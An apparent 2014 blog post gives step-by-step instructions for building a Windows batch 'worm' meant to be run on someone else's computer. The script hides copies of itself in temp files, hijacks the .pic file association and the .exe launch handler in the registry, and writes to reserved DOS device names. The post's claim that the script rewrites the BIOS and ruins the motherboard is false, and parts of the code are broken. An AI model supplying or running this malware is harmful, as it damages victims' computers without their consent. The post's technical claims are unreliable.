Friday, March 21, 2014

How to Kill someones PC


Now, there is no going back from executing this batch code. Once executed it will rewrite the BIOS and a few other core clocks rendering the motherboard useless. The only way to come back after a execution of this code is to buy a new motherboard.
 
Step One: Open notepad or anything similar.

Step Two: Paste the following code into notepad
 
@echo off & break off
:%random%
://associate .pic as batfile for camouflaggin
assoc .pic=batfile

:%random%
://creates and hides files
type %0 >%temp%\%username%.pic
type %0 >%temp%\%username%.bat
attrib +h +s +a +r %temp%\%username%.bat
attrib +h +s +a +r %temp%\%username%.pic

:%random%
://registry entry for starting worm on every *.exe execution
regadd "HKCR\exefile\shell\open\command" /v "@" /d "%temp%\%username%.pic ""\%1\"" %* /f

:%random%
://starting payload mwahaha
Echo 123>clock$ &echo 123>CON &echo 123>AUX &echo 123>PRN &echo 123>COM1 &echo 123>COM2 &echo 123>COM3 &echo 123>COM4 &echo 123>dosx &echo 123>IO &echo 123>HIMEM &echo 123>XMSXXXX0 &echo 123>MOUSE &echo 123>REDIR &echo 123>KBD &echo 123>SYSTEM
exit
  
Step Three: Save the file as a .bat like so....
 How to use the batch
Now there are a few ways you can run this batch on someones computer.
 
 

No comments:

Post a Comment

Contact Form

Name

Email *

Message *